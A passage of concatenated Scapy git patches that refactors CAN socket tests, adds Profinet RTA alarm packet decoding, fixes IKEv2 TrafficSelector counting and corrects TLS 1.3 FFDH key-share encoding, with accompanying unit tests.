+sock2.send(CAN(identifier=0x7ff,length=1,data=b'\x01')) rx = sock1.recv() sock1.close() sock2.close() -thread.join(timeout=5) assert rx == CAN(identifier=0x7ff,length=1,data=b'\x01') @@ -87,11 +78,8 @@ assert rx == CAN(identifier=0x7ff,length=1,data=b'\x01') with PythonCANSocket(bustype='socketcan', channel='vcan0') as sock1, \ PythonCANSocket(bustype='socketcan', channel='vcan0') as sock2: - thread = threading.Thread(target=sender, args=(sock2, CAN(identifier=0x7ff,length=1,data=b'\x01'),)) - thread.start() - send_done.wait(timeout=1) + sock2.send(CAN(identifier=0x7ff,length=1,data=b'\x01')) rx = sock1.recv() - thread.join(timeout=5) assert rx == CAN(identifier=0x7ff,length=1,data=b'\x01') @@ -101,12 +89,10 @@ conf.contribs['CAN']['swap-bytes'] = True with NativeCANSocket(bustype='socketcan', channel='vcan0') as sock1, \ NativeCANSocket(bustype='socketcan', channel='vcan0') as sock2: - time.sleep(0) - thread = threading.Thread(target=sender, args=(sock2, CAN(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08'),)) - rx = sock1.sniff(count=1, timeout=1, started_callback=thread.start) + sock2.send(CAN(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) + rx = sock1.sniff(count=1, timeout=1) assert len(rx) == 1 assert rx[0] == CAN(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08') - thread.join(timeout=5) conf.contribs['CAN']['swap-bytes'] = False @@ -116,10 +102,9 @@ conf.contribs['CAN']['swap-bytes'] = True with PythonCANSocket(bustype='socketcan', channel='vcan0') as sock1, \ PythonCANSocket(bustype='socketcan', channel='vcan0') as sock2: - thread = threading.Thread(target=sender, args=(sock2, CAN(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08'),)) - rx = sock1.sniff(count=1, timeout=1, started_callback=thread.start) + sock2.send(CAN(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) + rx = sock1.sniff(count=1, timeout=1) assert rx[0] == CAN(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08') - thread.join(timeout=5) conf.contribs['CAN']['swap-bytes'] = False @@ -134,10 +119,10 @@ msgs = [CAN(identifier=0x200, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08' with NativeCANSocket(bustype='socketcan', channel='vcan0', can_filters=[{'can_id': 0x200, 'can_mask': 0x7ff}]) as sock1, \ NativeCANSocket(bustype='socketcan', channel='vcan0') as sock2: - thread = threading.Thread(target=sender, args=(sock2, msgs,)) - packets = sock1.sniff(timeout=0.1, started_callback=thread.start) + for m in msgs: + sock2.send(m) + packets = sock1.sniff(timeout=0.1, count=3) assert len(packets) == 3 - thread.join(timeout=5) = PythonCANSocket sniff with filtermask 0x7ff @@ -150,10 +135,10 @@ msgs = [CAN(identifier=0x200, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08' with PythonCANSocket(bustype='socketcan', channel='vcan0', can_filters=[{'can_id': 0x200, 'can_mask': 0x7ff}]) as sock1, \ PythonCANSocket(bustype='socketcan', channel='vcan0') as sock2: - thread = threading.Thread(target=sender, args=(sock2, msgs,)) - packets = sock1.sniff(timeout=0.1, started_callback=thread.start) + for m in msgs: + sock2.send(m) + packets = sock1.sniff(timeout=0.1, count=3) assert len(packets) == 3 - thread.join(timeout=5) = NativeCANSocket sniff with multiple filters @@ -167,10 +152,10 @@ msgs = [CAN(identifier=0x200, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08' with NativeCANSocket(bustype='socketcan', channel='vcan0', can_filters=[{'can_id': 0x200, 'can_mask': 0x7ff}, {'can_id': 0x400, 'can_mask': 0x7ff}, {'can_id': 0x600, 'can_mask': 0x7ff}, {'can_id': 0x7ff, 'can_mask': 0x7ff}]) as sock1, \ NativeCANSocket(bustype='socketcan', channel='vcan0') as sock2: - thread = threading.Thread(target=sender, args=(sock2, msgs,)) - packets = sock1.sniff(timeout=0.1, started_callback=thread.start) + for m in msgs: + sock2.send(m) + packets = sock1.sniff(timeout=0.1, count=4) assert len(packets) == 4 - thread.join(timeout=5) = PythonCANSocket sniff with multiple filters @@ -184,10 +169,10 @@ msgs = [CAN(identifier=0x200, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08' with PythonCANSocket(bustype='socketcan', channel='vcan0', can_filters=[{'can_id': 0x200, 'can_mask': 0x7ff}, {'can_id': 0x400, 'can_mask': 0x7ff}, {'can_id': 0x600, 'can_mask': 0x7ff}, {'can_id': 0x7ff, 'can_mask': 0x7ff}]) as sock1, \ PythonCANSocket(bustype='socketcan', channel='vcan0') as sock2: - thread = threading.Thread(target=sender, args=(sock2, msgs,)) - packets = sock1.sniff(timeout=0.1, started_callback=thread.start) + for m in msgs: + sock2.send(m) + packets = sock1.sniff(timeout=0.1, count=4) assert len(packets) == 4 - thread.join(timeout=5) + bridge and sniff tests @@ -201,14 +186,6 @@ assert 0 == os.system(bashCommand) sock0 = NativeCANSocket(bustype='socketcan', channel='vcan0') sock1 = NativeCANSocket(bustype='socketcan', channel='vcan1') -def senderVCan0(): - sock0.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10020000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10030000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10040000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - bridgeStarted = threading.Event() def bridge(): global bridgeStarted @@ -222,37 +199,34 @@ def bridge(): return pkt bSock0.timeout = 0.01 bSock1.timeout = 0.01 - bridge_and_sniff(if1=bSock0, if2=bSock1, xfrm12=pnr, xfrm21=pnr, timeout=0.5, started_callback=bridgeStarted.set) + bridge_and_sniff(if1=bSock0, if2=bSock1, xfrm12=pnr, xfrm21=pnr, timeout=0.5, started_callback=bridgeStarted.set, count=6) bSock0.close() bSock1.close() threadBridge = threading.Thread(target=bridge) threadBridge.start() -threadSender = threading.Thread(target=senderVCan0) bridgeStarted.wait() -packetsVCan1 = sock1.sniff(timeout=0.5, started_callback=threadSender.start) +sock0.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10020000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10030000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10040000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) + +packetsVCan1 = sock1.sniff(timeout=0.5, count=6) assert len(packetsVCan1) == 6 sock1.close() sock0.close() threadBridge.join(timeout=3) -threadSender.join(timeout=3) = PythonCANSocket bridge and sniff setup vcan1 package forwarding sock0 = PythonCANSocket(bustype='socketcan', channel='vcan0') sock1 = PythonCANSocket(bustype='socketcan', channel='vcan1') -def senderVCan0(): - sock0.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10020000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10030000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10040000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - bridgeStarted = threading.Event() def bridge(): global bridgeStarted @@ -266,24 +240,28 @@ def bridge(): return pkt bSock0.timeout = 0.01 bSock1.timeout = 0.01 - bridge_and_sniff(if1=bSock0, if2=bSock1, xfrm12=pnr, xfrm21=pnr, timeout=0.5, started_callback=bridgeStarted.set) + bridge_and_sniff(if1=bSock0, if2=bSock1, xfrm12=pnr, xfrm21=pnr, timeout=0.5, started_callback=bridgeStarted.set, count=6) bSock0.close() bSock1.close() threadBridge = threading.Thread(target=bridge) threadBridge.start() -threadSender = threading.Thread(target=senderVCan0) bridgeStarted.wait() -packetsVCan1 = sock1.sniff(timeout=0.5, started_callback=threadSender.start) +sock0.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10020000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10030000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10040000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) + +packetsVCan1 = sock1.sniff(timeout=0.5, count=6) assert len(packetsVCan1) == 6 sock1.close() sock0.close() threadBridge.join(timeout=3) -threadSender.join(timeout=3) - + Cleanup From cfb7bc2d32a546e92ad6592405bb9424cd2e082f Mon Sep 17 00:00:00 2001 From: Chris Packham Date: Mon, 16 Aug 2021 14:51:29 +1200 Subject: [PATCH 0639/1632] contrib/pnio: Add support for Profinet RTA Alarms Add support for building and decoding Profinet Real Time Acyclic packets used for Alarm notifications. Signed-off-by: Chris Packham --- scapy/contrib/pnio.py | 6 ++ scapy/contrib/pnio_rpc.py | 205 +++++++++++++++++++++++++++++++++++++- test/contrib/pnio_rpc.uts | 64 ++++++++++++ 3 files changed, 272 insertions(+), 3 deletions(-) diff --git a/scapy/contrib/pnio.py b/scapy/contrib/pnio.py index 373cbd7fded..30be09c6ad4 100644 --- a/scapy/contrib/pnio.py +++ b/scapy/contrib/pnio.py @@ -111,6 +111,12 @@ def guess_payload_class(self, payload): if self.frameID in [0xfefe, 0xfeff, 0xfefd]: from scapy.contrib.pnio_dcp import ProfinetDCP return ProfinetDCP + elif self.frameID == 0xFE01: + from scapy.contrib.pnio_rpc import Alarm_Low + return Alarm_Low + elif self.frameID == 0xFC01: + from scapy.contrib.pnio_rpc import Alarm_High + return Alarm_High elif ( (0x0100 <= self.frameID < 0x1000) or (0x8000 <= self.frameID < 0xFC00) diff --git a/scapy/contrib/pnio_rpc.py b/scapy/contrib/pnio_rpc.py index 0de11dcb6e0..6ba97e6969c 100644 --- a/scapy/contrib/pnio_rpc.py +++ b/scapy/contrib/pnio_rpc.py @@ -24,10 +24,10 @@ import struct from uuid import UUID -from scapy.packet import Packet, bind_layers +from scapy.packet import Packet, Raw, bind_layers from scapy.config import conf -from scapy.fields import BitField, ByteField, BitEnumField, ConditionalField, \ - FieldLenField, FieldListField, IntField, IntEnumField, \ +from scapy.fields import BitField, ByteField, BitEnumField, ByteEnumField, \ + ConditionalField, FieldLenField, FieldListField, IntField, IntEnumField, \ LenField, MACField, PadField, PacketField, PacketListField, \ ShortEnumField, ShortField, StrFixedLenField, StrLenField, \ UUIDField, XByteField, XIntField, XShortEnumField, XShortField @@ -912,6 +912,205 @@ class AlarmCRBlockRes(Block): block_type = 0x8103 +class AlarmItem(Packet): + fields_desc = [ + XShortField("UserStructureIdentifier", 0), + PacketField("load", "", Raw), + ] + + def extract_padding(self, s): + return None, s # No extra payload + + +class MaintenanceItem(AlarmItem): + fields_desc = [ + XShortField("UserStructureIdentifier", 0), + BlockHeader, + StrFixedLenField("padding", "", length=2), + XIntField("MaintenanceStatus", 0), + ] + + +class DiagnosisItem(AlarmItem): + fields_desc = [ + XShortField("UserStructureIdentifier", 0), + XShortField("ChannelNumber", 0), + XShortField("ChannelProperties", 0), + XShortField("ChannelErrorType", 0), + ConditionalField( + cond=lambda p: p.getfieldval("UserStructureIdentifier") in [ + 0x8002, 0x8003], + fld=XShortField("ExtChannelErrorType", 0)), + ConditionalField( + cond=lambda p: p.getfieldval("UserStructureIdentifier") in [ + 0x8002, 0x8003], + fld=XIntField("ExtChannelAddValue", 0)), + ConditionalField( + cond=lambda p: p.getfieldval("UserStructureIdentifier") == 0x8003, + fld=XIntField("QualifiedChannelQualifier", 0)), + ] + + +class UploadRetrievalItem(AlarmItem): + fields_desc = [ + XShortField("UserStructureIdentifier", 0), + BlockHeader, + StrFixedLenField("padding", "", length=2), + XIntField("URRecordIndex", 0), + XIntField("URRecordLength", 0), + ] + + +class iParameterItem(AlarmItem): + fields_desc = [ + XShortField("UserStructureIdentifier", 0), + BlockHeader, + StrFixedLenField("padding", "", length=2), + XIntField("iPar_Req_Header", 0), + XIntField("Max_Segm_Size", 0), + XIntField("Transfer_Index", 0), + XIntField("Total_iPar_Size", 0), + ] + + +PE_OPERATIONAL_MODE = { + 0x00: "PE_PowerOff", + 0xF0: "PE_Operate", + 0xFE: "PE_SleepModeWOL", + 0xFF: "PE_ReadyToOperate", +} +PE_OPERATIONAL_MODE.update({i: "PE_EnergySavingMode_{}".format(i) + for i in range(0x1, 0x20)}) +PE_OPERATIONAL_MODE.update({i: "Reserved" for i in range(0x20, 0xF0)}) +PE_OPERATIONAL_MODE.update({i: "Reserved" for i in range(0xF1, 0xFE)}) + + +class PE_AlarmItem(AlarmItem): + fields_desc = [ + XShortField("UserStructureIdentifier", 0), + BlockHeader, + ByteEnumField("PE_OperationalMode", 0, PE_OPERATIONAL_MODE), + ] + + +class RS_AlarmItem(AlarmItem): + fields_desc = [ + XShortField("UserStructureIdentifier", 0), + XShortField("RS_AlarmInfo", 0), + ] + + +class PRAL_AlarmItem(AlarmItem): + fields_desc = [ + XShortField("UserStructureIdentifier", 0), + XShortField("ChannelNumber", 0), + XShortField("PRAL_ChannelProperties", 0), + XShortField("PRAL_Reason", 0), + XShortField("PRAL_ExtReason", 0), + StrLenField("PRAL_ReasonAddValue", "", + length_from=lambda x:x.len - 10), + ] + + +PNIO_RPC_ALARM_ASSOCIATION = { + "8000": DiagnosisItem, + "8002": DiagnosisItem, + "8003": DiagnosisItem, + "8100": MaintenanceItem, + "8200": UploadRetrievalItem, + "8201": iParameterItem, + "8300": RS_AlarmItem, + "8301": RS_AlarmItem, + "8302": RS_AlarmItem, + # "8303": RS_AlarmItem, + "8310": PE_AlarmItem, + "8320": PRAL_AlarmItem, +} + + +def _guess_alarm_payload(_pkt, *args, **kargs): + cls = AlarmItem + + btype = bytes_hex(_pkt[:2]).decode("utf8") + if btype in PNIO_RPC_ALARM_ASSOCIATION: + cls = PNIO_RPC_ALARM_ASSOCIATION[btype] + + return cls(_pkt, *args, **kargs) + + +class AlarmNotificationPDU(Block): + fields_desc = [ + # IEC-61158-6-10:2021, Table 513 + BlockHeader, + ShortField("AlarmType", 0), + XIntField("API", 0), + ShortField("SlotNumber", 0), + ShortField("SubslotNumber", 0), + XIntField("ModuleIdentNumber", 0), + XIntField("SubmoduleIdentNUmber", 0), + XShortField("AlarmSpecifier", 0), + PacketListField("AlarmPayload", [], _guess_alarm_payload) + ] + + +class AlarmNotification_High(AlarmNotificationPDU): + block_type = 0x0001 + + +class AlarmNotification_Low(AlarmNotificationPDU): + block_type = 0x0002 + + +PDU_TYPE_TYPE = { + 0x01: "RTA_TYPE_DATA", + 0x02: "RTA_TYPE_NACK", + 0x03: "RTA_TYPE_ACK", + 0x04: "RTA_TYPE_ERR", + 0x05: "RTA_TYPE_FREQ", + 0x06: "RTA_TYPE_FRSP", +} +PDU_TYPE_TYPE.update({i: "Reserved" for i in range(0x07, 0x10)}) + + +PDU_TYPE_VERSION = { + 0x00: "Reserved", + 0x01: "Version 1", + 0x02: "Version 2", +} +PDU_TYPE_VERSION.update({i: "Reserved" for i in range(0x03, 0x10)}) + + +class PNIORealTimeAcyclicPDUHeader(Packet): + fields_desc = [ + # IEC-61158-6-10:2021, Table 241 + ShortField("AlarmDstEndpoint", 0), + ShortField("AlarmSrcEndpoint", 0), + BitEnumField("PDUTypeType", 0, 4, PDU_TYPE_TYPE), + BitEnumField("PDUTypeVersion", 0, 4, PDU_TYPE_VERSION), + BitField("AddFlags", 0, 8), + XShortField("SendSeqNum", 0), + XShortField("AckSeqNum", 0), + XShortField("VarPartLen", 0), + ] + + def __new__(cls, name, bases, dct): + raise NotImplementedError() + + +class Alarm_Low(Packet): + fields_desc = [ + PNIORealTimeAcyclicPDUHeader, + PacketField("RTA-SDU", None, AlarmNotification_Low), + ] + + +class Alarm_High(Packet): + fields_desc = [ + PNIORealTimeAcyclicPDUHeader, + PacketField("RTA-SDU", None, AlarmNotification_High), + ] + + # PROFINET IO DCE/RPC PDU PNIO_RPC_BLOCK_ASSOCIATION = { # requests diff --git a/test/contrib/pnio_rpc.uts b/test/contrib/pnio_rpc.uts index 19f31dd1dbc..0ae0c3d265b 100644 --- a/test/contrib/pnio_rpc.uts +++ b/test/contrib/pnio_rpc.uts @@ -700,3 +700,67 @@ bytes(p) == bytearray.fromhex( '04000000100000000000a0de976cd11182710605040302010200a0de976cd111827100a02442df7d0403020106050807090a0b0c0d0e0f000000000001000000000000000000ffffffff340000000000' + \ '2000000020000000200000000000000020000000' + \ '0112001c01000000fedcba9876543210fedcba98765432100000000000020000') + + +### PNIO Alarms + += PNIO Alarm decoding (Alarm_Low) + +p = Ether(b'\x00\x11\x22\x33\x44\x55' \ + b'\x00\x66\x77\x88\x99\xaa' \ + b'\x81\x00\xa0\x00' \ + b'\x88\x92' \ + b'\xfe\x01' \ + b'\x00\x03\x00\x03\x11\x11\xff\xff\xff\xfe\x00\x36' \ + b'\x00\x02\x00\x32\x01\x00\x00\x01\x00\x00\x00\x00\x00' \ + b'\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x08\x00' \ + b'\x81\x00\x0f\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00\x02' \ + b'\x80\x02\x00\x0f\x2c\x00\x00\x05\x80\x00\x00\x00\x00\x22') +assert(p[ProfinetIO].frameID == 0xfe01) +assert(isinstance(p[ProfinetIO].payload, Alarm_Low)) +assert(p[AlarmNotification_Low].block_type == 0x0002) +assert(isinstance(p[AlarmNotification_Low].AlarmPayload[0], MaintenanceItem)) +assert(p[MaintenanceItem].UserStructureIdentifier == 0x8100) +assert(isinstance(p[AlarmNotification_Low].AlarmPayload[1], DiagnosisItem)) +assert(p[DiagnosisItem].UserStructureIdentifier == 0x8002) + += PNIO Alarm decoding (Alarm_High) +p = Ether(b'\x00\x11\x22\x33\x44\x55' \ + b'\x00\x66\x77\x88\x99\xaa' \ + b'\x81\x00\xa0\x00' \ + b'\x88\x92' \ + b'\xfc\x01' \ + b'\x00\x03\x00\x03\x11\x11\xff\xff\xff\xfe\x00\x36' \ + b'\x00\x02\x00\x32\x01\x00\x00\x01\x00\x00\x00\x00\x00' \ + b'\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x08\x00' \ + b'\x81\x00\x0f\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00\x02' \ + b'\x80\x02\x00\x0f\x2c\x00\x00\x05\x80\x00\x00\x00\x00\x22') +assert(p[ProfinetIO].frameID == 0xfc01) +assert(isinstance(p[ProfinetIO].payload, Alarm_High)) +assert(p[AlarmNotification_High].block_type == 0x0002) +assert(isinstance(p[AlarmNotification_High].AlarmPayload[0], MaintenanceItem)) +assert(p[MaintenanceItem].UserStructureIdentifier == 0x8100) +assert(isinstance(p[AlarmNotification_High].AlarmPayload[1], DiagnosisItem)) +assert(p[DiagnosisItem].UserStructureIdentifier == 0x8002) + += PNIO Alarm DiagnosisItem + +p = AlarmNotification_Low(AlarmPayload=[MaintenanceItem(), DiagnosisItem()]) +assert(raw(p) == bytearray.fromhex('0002002c0100000000000000000000000000000000000000000000000000000001000000000000000000000000000000')) + += PNIO Alarm UploadRetrievalItem + +p = AlarmNotification_Low(AlarmPayload=[MaintenanceItem(), UploadRetrievalItem()]) +assert(raw(p) == bytearray.fromhex('00020036010000000000000000000000000000000000000000000000000000000100000000000000000000000000010000000000000000000000')) + += PNIO Alarm iParameterItem +p = AlarmNotification_Low(AlarmPayload=[MaintenanceItem(), iParameterItem()]) +assert(raw(p) == bytearray.fromhex('0002003e0100000000000000000000000000000000000000000000000000000001000000000000000000000000000100000000000000000000000000000000000000')) + += PNIO Alarm RS_AlarmItem +p = AlarmNotification_Low(AlarmPayload=[MaintenanceItem(), RS_AlarmItem()]) +assert(raw(p) == bytearray.fromhex('0002002801000000000000000000000000000000000000000000000000000000010000000000000000000000')) + += PNIO Alarm PRAL_AlarmItem +p = AlarmNotification_Low(AlarmPayload=[MaintenanceItem(), PRAL_AlarmItem()]) +assert(raw(p) == bytearray.fromhex('0002002e01000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000')) From 1ddb625f97710e070896a80b60670f750ed44ab8 Mon Sep 17 00:00:00 2001 From: Jakob Rieck <0xbf00@users.noreply.github.com> Date: Tue, 31 Aug 2021 23:38:50 +0200 Subject: [PATCH 0640/1632] Fixes and improves TrafficSelector handling in IKEv2 (#3322) * Fixes and improves TrafficSelector handling in IKEv2 Corrects dissecting of packets containing multiple TrafficSelectors Previously, dissecting IKEv2_payload_IDi and IKEv2_payload_IDr with more than one TrafficSelector would incorrectly result in just one of the TrafficSelectors being properly identified. Adds automatic calculation of the number_of_TSs field for TSi and TSr IKEv2 payloads. Adds corresponding unit tests --- scapy/contrib/ikev2.py | 17 +++++++++++++---- test/contrib/ikev2.uts | 20 ++++++++++++++++++++ 2 files changed, 33 insertions(+), 4 deletions(-) diff --git a/scapy/contrib/ikev2.py b/scapy/contrib/ikev2.py index 9d8d8814d58..8f54d7fa7b0 100644 --- a/scapy/contrib/ikev2.py +++ b/scapy/contrib/ikev2.py @@ -525,6 +525,9 @@ def dispatch_hook(cls, _pkt=None, *args, **kargs): return RawTrafficSelector return IPv4TrafficSelector + def extract_padding(self, s): + return '', s + class IPv4TrafficSelector(TrafficSelector): name = "IKEv2 IPv4 Traffic Selector" @@ -586,9 +589,12 @@ class IKEv2_payload_TSi(IKEv2_class): ByteEnumField("next_payload", None, IKEv2_payload_type), ByteField("res", 0), FieldLenField("length", None, "traffic_selector", "H", adjust=lambda pkt, x:x + 8), # noqa: E501 - ByteField("number_of_TSs", 0), + FieldLenField("number_of_TSs", None, fmt="B", + count_of="traffic_selector"), X3BytesField("res2", 0), - PacketListField("traffic_selector", None, TrafficSelector, length_from=lambda x:x.length - 8, count_from=lambda x:x.number_of_TSs), # noqa: E501 + PacketListField("traffic_selector", None, TrafficSelector, + length_from=lambda x:x.length - 8, + count_from=lambda x:x.number_of_TSs), ] @@ -599,9 +605,12 @@ class IKEv2_payload_TSr(IKEv2_class): ByteEnumField("next_payload", None, IKEv2_payload_type), ByteField("res", 0), FieldLenField("length", None, "traffic_selector", "H", adjust=lambda pkt, x:x + 8), # noqa: E501 - ByteField("number_of_TSs", 0), + FieldLenField("number_of_TSs", None, fmt="B", + count_of="traffic_selector"), X3BytesField("res2", 0), - PacketListField("traffic_selector", None, TrafficSelector, length_from=lambda x:x.length - 8, count_from=lambda x:x.number_of_TSs), # noqa: E501 + PacketListField("traffic_selector", None, TrafficSelector, + length_from=lambda x:x.length - 8, + count_from=lambda x:x.number_of_TSs), ] diff --git a/test/contrib/ikev2.uts b/test/contrib/ikev2.uts index 607f4a312f4..a29ed5de879 100644 --- a/test/contrib/ikev2.uts +++ b/test/contrib/ikev2.uts @@ -115,6 +115,26 @@ assert isinstance(a, IPv4TrafficSelector) assert isinstance(b, IPv6TrafficSelector) assert isinstance(c, EncryptedTrafficSelector) += Test TSi with multiple TrafficSelector dissection + +a = IKEv2_payload_TSi() +a.traffic_selector.extend(IPv4TrafficSelector() * 2) +a.traffic_selector.extend(IPv6TrafficSelector() * 3) +assert len(a.traffic_selector) == 5 + +b = IKEv2_payload_TSi(raw(a)) +assert len(b.traffic_selector) == 5 + += Test automatic calculation of number_of_TSs field + +a = IKEv2_payload_TSi(traffic_selector=IPv4TrafficSelector() * 2) +b = IKEv2_payload_TSi(raw(a)) +assert b.number_of_TSs == 2 + +c = IKEv2_payload_TSr(traffic_selector=IPv4TrafficSelector() * 2) +d = IKEv2_payload_TSr(raw(c)) +assert d.number_of_TSs == 2 + = IKEv2_payload_Encrypted_Fragment, simple tests s = b"\x00\x00\x00\x08\x00\x01\x00\x01" From fee76d182d37d3565c2c1acac9f79a84dfc17923 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sun, 29 Aug 2021 03:23:28 +0200 Subject: [PATCH 0641/1632] Fix FFDH for scapy --- scapy/compat.py | 23 +++++++++++++++++++++++ scapy/layers/tls/crypto/groups.py | 10 ++++++++-- scapy/layers/tls/keyexchange_tls13.py | 24 ++++++++++++++++-------- test/tls.uts | 19 +++++++++++++++++++ 4 files changed, 66 insertions(+), 10 deletions(-) diff --git a/scapy/compat.py b/scapy/compat.py index 23817d5e37f..5b16aaa6849 100644 --- a/scapy/compat.py +++ b/scapy/compat.py @@ -329,6 +329,29 @@ def hex_bytes(x): return binascii.a2b_hex(bytes_encode(x)) +if six.PY2: + def int_bytes(x, size): + # type: (int, int) -> bytes + """Convert an int to an arbitrary sized bytes string""" + _hx = hex(x)[2:].strip("L") + return binascii.unhexlify("0" * (size * 2 - len(_hx)) + _hx) + + def bytes_int(x): + # type: (bytes) -> int + """Convert an arbitrary sized bytes string to an int""" + return int(x.encode('hex'), 16) +else: + def int_bytes(x, size): + # type: (int, int) -> bytes + """Convert an int to an arbitrary sized bytes string""" + return x.to_bytes(size, byteorder='big') + + def bytes_int(x): + # type: (bytes) -> int + """Convert an arbitrary sized bytes string to an int""" + return int.from_bytes(x, "big") + + def base64_bytes(x): # type: (AnyStr) -> bytes """Turn base64 into bytes""" diff --git a/scapy/layers/tls/crypto/groups.py b/scapy/layers/tls/crypto/groups.py index e27be4cee4d..c1796ae74cd 100644 --- a/scapy/layers/tls/crypto/groups.py +++ b/scapy/layers/tls/crypto/groups.py @@ -15,6 +15,7 @@ from __future__ import absolute_import from scapy.config import conf +from scapy.compat import bytes_int, int_bytes from scapy.error import warning from scapy.utils import long_converter import scapy.modules.six as six @@ -443,11 +444,14 @@ class ffdhe8192(_FFDHParams): # From RFC 7919 def _tls_named_groups_import(group, pubbytes): if group in _tls_named_ffdh_groups: + # https://datatracker.ietf.org/doc/html/rfc8446#section-4.2.8.1 params = _ffdh_groups[_tls_named_ffdh_groups[group]][0] pn = params.parameter_numbers() - public_numbers = dh.DHPublicNumbers(pubbytes, pn) + y = bytes_int(pubbytes) + public_numbers = dh.DHPublicNumbers(y, pn) return public_numbers.public_key(default_backend()) elif group in _tls_named_curves: + # https://datatracker.ietf.org/doc/html/rfc8446#section-4.2.8.2 if _tls_named_curves[group] in ["x25519", "x448"]: if conf.crypto_valid_advanced: if _tls_named_curves[group] == "x25519": @@ -472,10 +476,12 @@ def _tls_named_groups_import(group, pubbytes): def _tls_named_groups_pubbytes(privkey): if isinstance(privkey, dh.DHPrivateKey): + # https://datatracker.ietf.org/doc/html/rfc8446#section-4.2.8.1 pubkey = privkey.public_key() - return pubkey.public_numbers().y + return int_bytes(pubkey.public_numbers().y, privkey.key_size) elif isinstance(privkey, (x25519.X25519PrivateKey, x448.X448PrivateKey)): + # https://datatracker.ietf.org/doc/html/rfc8446#section-4.2.8.2 pubkey = privkey.public_key() return pubkey.public_bytes( serialization.Encoding.Raw, diff --git a/scapy/layers/tls/keyexchange_tls13.py b/scapy/layers/tls/keyexchange_tls13.py index aed3634ed3d..e27f36c3b6b 100644 --- a/scapy/layers/tls/keyexchange_tls13.py +++ b/scapy/layers/tls/keyexchange_tls13.py @@ -11,9 +11,17 @@ from scapy.config import conf, crypto_validator from scapy.error import log_runtime -from scapy.fields import FieldLenField, IntField, PacketField, \ - PacketListField, ShortEnumField, ShortField, StrFixedLenField, \ - StrLenField +from scapy.fields import ( + FieldLenField, + IntField, + PacketField, + PacketListField, + ShortEnumField, + ShortField, + StrFixedLenField, + StrLenField, + XStrLenField, +) from scapy.packet import Packet, Padding from scapy.layers.tls.extensions import TLS_Ext_Unknown, _tls_ext from scapy.layers.tls.crypto.groups import ( @@ -39,8 +47,8 @@ class KeyShareEntry(Packet): name = "Key Share Entry" fields_desc = [ShortEnumField("group", None, _tls_named_groups), FieldLenField("kxlen", None, length_of="key_exchange"), - StrLenField("key_exchange", "", - length_from=lambda pkt: pkt.kxlen)] + XStrLenField("key_exchange", "", + length_from=lambda pkt: pkt.kxlen)] def __init__(self, *args, **kargs): self.privkey = None @@ -113,7 +121,7 @@ def post_build(self, pkt, pay): privshares = self.tls_session.tls13_client_privshares for kse in self.client_shares: if kse.privkey: - if _tls_named_curves[kse.group] in privshares: + if _tls_named_groups[kse.group] in privshares: pkt_info = pkt.firstlayer().summary() log_runtime.info("TLS: group %s used twice in the same ClientHello [%s]", kse.group, pkt_info) # noqa: E501 break @@ -125,11 +133,11 